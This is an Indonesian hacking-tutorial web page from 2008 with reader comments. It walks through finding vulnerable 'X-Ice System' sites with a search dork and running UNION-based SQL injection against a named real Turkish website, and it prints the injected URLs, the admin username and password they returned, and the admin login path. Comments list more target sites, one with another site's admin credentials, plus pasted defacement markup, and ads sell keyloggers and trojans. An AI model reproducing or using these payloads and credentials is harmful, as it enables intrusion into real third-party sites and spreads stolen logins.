Tutorial Hacking | SQL Injection pada X-Ice System V-1

Tanggal : Saturday, 22 November 2008 | Jam : 12 : 36 : 30 AM | GMT : +0700 | Negara : Indonesia

Posted By: Al-k

SQL Injection pada X-Ice System V-1

18-03-2007 | 18:45:46 | Halaman Ini dibaca 12126 kali

Hallo, bertemu kembali dengan saya, di tutorial yang kesekian kalinya, kali ini saya akan mencoba
mengajak anda untuk bersama-sama mengeksploitasi website yang memiliki bug SQL Injection.
Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak
vulnerability dari situs-situs yang masih bisa dimanfaatkan [red: exploitasi].
Ya, mungkin cukup sekian pengantarnya, terima kasih. Dadah... :)
Disini saya tidak akan menjelaskan secara detil bagaimana query didapatkan, karena butuh artikel lain
untuk membahasnya, dan saya pun masih dalam tahap pembelajaran, jadi maaf-maaf aja, tutorialnya kurang lengkap.
:)

Untuk mencari targetnya, silahkan menggunakan keyword yang tepat ...
ex : inurl:/devami.asp?id= geri

Korban yang saya dapatkan adalah :

http://www.radyopinarim.com/haber1/devami.asp?id=1

Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini

Microsoft OLE DB Provider for ODBC Drivers hata '80040e14'

[Microsoft][ODBC Microsoft Access Sürücüsü] 'id=' sorgu ifadesi içindeki Sözdizimi hatasý (eksik iþleç)

/haber1/devami.asp, satýr 8

Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs ini.
Untuk mencari username nya anda tinggal mengganti angka 1 dengan

-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

kurang lebih alamat di browser seperti ini :
http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

Yang saya dapatkan usernamenya adalah Kadrius

dan untuk mencari passwordnya
:

-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

passwordnya adalah 19901990

Untuk login sebagai admin anda tinggal balik kehalaman

/admin/kontrol.asp

Ya, sekian saja tutorial singkat penggunaan SQL Injection sebagai exploitasi bug X-Ice system.
Selamat mencoba, terima kasih.

Shoutz to : B_scorpio ==> Salute sama perjuangannya menguasai dunia .... huehuehuehue bcanda

Paket CD Hacking Tools 2008 v.2
Binder, bios, bluetooth, bruteforce tools, crack search, exploit, keyloggers, passw cracker, phising, PHP Shells, rootkits, scanner, trojan, wireless. Backtrack 2, dan masih banyak lagi...

Ads by ilmuwebsite.com

DVD Hacking Career Academy
17 Episode, Footprinting, Reconnaissance, Scanning, Enumeration, Hacking & Defending Wireless, etc...

Ads by ilmuwebsite.com

Implementasi Boleh | Copy Paste Dilarang
© Copyright ilmuwebsite.com 2008
Jika anda me-link artikel ini kami menghargainya

Artikel Category => Tutorial Hacking

Link ke halaman ini :

<a href="http://www.ilmuwebsite.com/detil_hacking/9/SQL_Injection_pada_X-Ice_System_V-1/">SQL Injection pada X-Ice System V-1</a>

Link-nya akan seperti ini >> SQL Injection pada X-Ice System V-1
Comment Untuk Artikel Ini :

- Skyhima
06-11-2008 | 10:31:12 | koneksi: | ip: (125.163.98.188) | proxy: ()

Bos..
ko ga bisa yah alamat ini : http://www.yakinca.bel.tr/devami.asp?id=

tolong pencerahannya yah..??

atau via email ajah..
fuad_@telkom.net

- Wew
14-04-2008 | 23:00:52 | koneksi: | ip: (202.149.64.94) | proxy: ()

ZPYhack

By : ZPY-kurakura
Posted 13/10/2007 09:52
/>

KENAPA FS DI BLOK ..!?

Loked By xXxCel-*xXx

- Jimmy
10-04-2008 | 09:21:43 | koneksi: 1.1 localhost:3128 (squid/2.6. | ip: (125.164.238.140) | proxy: (192.168.23.109)

Udah dapet username sama password, gimana cara masuk ke adminnya? udah aku ketikan /admin/kontrol.asp dibelakang urlnya kok tetep gak bisa?

- Pardila wisman
18-01-2008 | 21:06:50 | koneksi: 1.1 proxy-dmv.csmnap.net:8080 | ip: (210.79.216.4) | proxy: (10.5.4.20)

Ass. bro bantuin aku dong cara penggunaan SQL Injection, aku belajar jadi hacker dan menyelesaikan mision dari situs www.boleh-hacking.com mission yang ke empat. disitu kita mendefec web dan masuk ke halaman admin nya dan membuat serta mencari bugnya. ban

- SPOOCKY
16-01-2008 | 16:05:51 | koneksi: 1.1 Garasi-21.net:3128 (squid/ | ip: (202.149.80.54) | proxy: ()

Bro mohon bantuan nya nya ini saya sudah dpt login n pass nya admin tp kok gak bisa masuk ya
login:admin
pass:ama12t56ya
web:http://www.amasyasanayi.gov.tr

- Patch.me
23-09-2007 | 17:23:44 | koneksi: | ip: (208.255.68.245) | proxy: ()

Gajelasbangetsihnitutorpasswordnyadarimana???????

- ***************************
19-09-2007 | 12:49:02 | koneksi: | ip: (125.163.84.65) | proxy: ()

<H1><marquee>dfuywfuywfuyw<marquee><H1>

- We
11-09-2007 | 08:38:13 | koneksi: | ip: (222.124.183.227) | proxy: ()

<div id="Layer1" style="border: 1px none rgb(0, 0, 0); z-index: 1; left: 0px; width: 1000px; position: absolute; top: 0px; height: 10000px;background-color: Black;"> color="Red">……isikan teks anda disini…….
color ="yel

- Huhui
18-08-2007 | 09:32:51 | koneksi: 1.0 proxy:8080 (squid/2.5.STAB | ip: (222.124.203.54) | proxy: (192.168.2.88, 194.15)

Bro kalo databasenya pake mysql trus pemrogramananya pake php kaga bisa yah ini khusus untu asp sam sql server bukan??

- Onche
15-08-2007 | 22:33:26 | koneksi: 1.1 gateway.cm-net.com:3128 (s | ip: (125.162.255.139) | proxy: (192.168.1.18)

Gimn carax mas? kok gw g dpt2 sih! username liat dimn? password g tau nongol dimn? pleac.... tolngin dunk..

- Mbuh
06-07-2007 | 18:05:59 | koneksi: | ip: (125.163.84.183) | proxy: ()

Du ileee sombonnya..!!!

- Paijo
06-06-2007 | 11:24:20 | koneksi: 1.1 bnet:8080 (squid/2.5.STABL | ip: (121.52.83.194) | proxy: (192.168.0.7, 121.52.)

Bsa tau dari paswordnya darimana?

- Kingsley
06-06-2007 | 11:05:14 | koneksi: | ip: (61.5.20.137) | proxy: ()

Wow... hebat banget loe bro, klu bole tau dapet tuh cara dari dukun mana? Mak Erot ya? just kidding... xixixi...

- Zvtral
11-05-2007 | 12:48:53 | koneksi: | ip: (202.159.50.114) | proxy: ()

Ko bs tau "kullaniciad" untuk admin dan "sifre" untuk password darimn cara taunya thx 4 artikelnya

- Roti
14-04-2007 | 23:22:46 | koneksi: | ip: (125.160.99.77) | proxy: ()

Mantap coy..!!!! siip lah..!! terus berkarya ampe nafas terakhir..!! huehehe

- Dede
12-04-2007 | 12:32:21 | koneksi: | ip: (125.163.72.125) | proxy: ()

Daftar

- Ilikitix
29-03-2007 | 13:59:03 | koneksi: | ip: (202.53.232.139) | proxy: ()

Cara masuk ke halaman admin gimana?

Statistik Situs

Visitor

: 1236239

Pages

: 4690347

Sejak 24 Januari 07

Informasi Anda:

IP:
38.103.63.55

Proxy:

Koneksi:

Live Chat

: b_scorpio

: Al-K

: Phii

: Safril

: Ivan

Shortcut

News Website

- Ubuntu 8.10 Resmi Dirilis

- Rilis terbaru Mandriva 2009

- Open Source CMS Award 2008

Belajar PHP

- Update, Delete Database with OOP

- Database in OOP way: Select data mysql with mysqli

- Passing variable menggunakan Session

PHP Tutorials

- Membuat Title Friendly

- Scanning All Files and Directories

- Downloader Function With PHP

HTML

- Membuat Box Style Link Cantik ala dr.emi dengan CS

- Beautifull Form dr.emi with CSS

- Ngetik Realtime - Document Object Model

Ajax

- jQuery Ajax Display for Loading Content

- Tutorial Ajax

Javascript

- Membuat pertanyaan konfirmasi

- Tulisan Matrix

- Hujan Cinta

SEO Artikel

- Bagaimana Seharusnya Penggunaan Image dan Flash

- Mobile Search dan Masa Depan Search Engine 2010

- Mendapatkan Link Popularity dari Artikel Directory

SEO Tutorial

- Menghilangkan Label Google Malware Badware

- Make Over Meta Description Anda

- Pengenalan dan Panduan Google Webmaster Tools

PhotoShop

- Advance Metalic Gloss Logo

- Dynamic Energy Saver From Gigabyte

- Sony Ericsson Logo

CorelDraw

- Teknik Gambar Bentuk Lipatan Kertas

- Teknik Gambar Bentuk Bagian 1

- Membuat Butiran Air

Flash Tutorials

- Membuat Logo Animasi

- Membuat Flash Icon Animasi

- Membuat Trail Mouse

Free Domain

- Free Subdomain co.cc

- Free subdomain uni.cc

- Domain gratis Lagi... | .name |

Free Hosting

- 000webhost - Hosting gratis PHP SQL

- Free Host PHP

- AwardSpace | Free PHP MySql

Review Software

- Jalankan aplikasi windows di linux dengan CrossOver

- Opera Mini 4.2 beta - Sudah Release

- Opera Mini - Phone Browser

Hacking

- Konsep sederhana Joomla Password Cracker

- Implementasi SQL Injection pada Joomla

- PHP Security - Cek Bug PHP Script

Banner Kami:

<a href="http://www.ilmuwebsite.com" target="_blank"><img src="http://unair.info/img/iweb.jpg" border="0"></a>

RSS per-Kategori
News
Belajar PHP
Tutorial PHP
Hacking

Thanks For Who Link Us :.

Caranya ikut promosi?

Menu
Home
News Website
PHP Programing
Belajar PHP
Tutorial PHP
PHP Reference
Ajax Programing
Ajax
Web Basic
Tutorial HTML
Javascript
Search Engine
Artikel Search Engine
Tutorial Search Engine
Design Grafis
Tutorial Photoshop
Tutorial CorelDraw
Tutorial Flash
Free Stock Photo
Domain & Hosting
Domain Gratis
Hosting Gratis
CMS
CMS
Software
Review Software
Hacking
Tutorial Hacking
Linux
Tutorial Linux
Computer Maintenance
Tutorial Jaringan
Interaksi dengan Kami
Guest Book | Buku Tamu
Penulis & Daftar Komunitas

Web Tools

- Hosting Speed

by: websitepulse.com

- Cek Pagerank
by: prchecker.info

- Cek C Class IP by: webrankinfo.com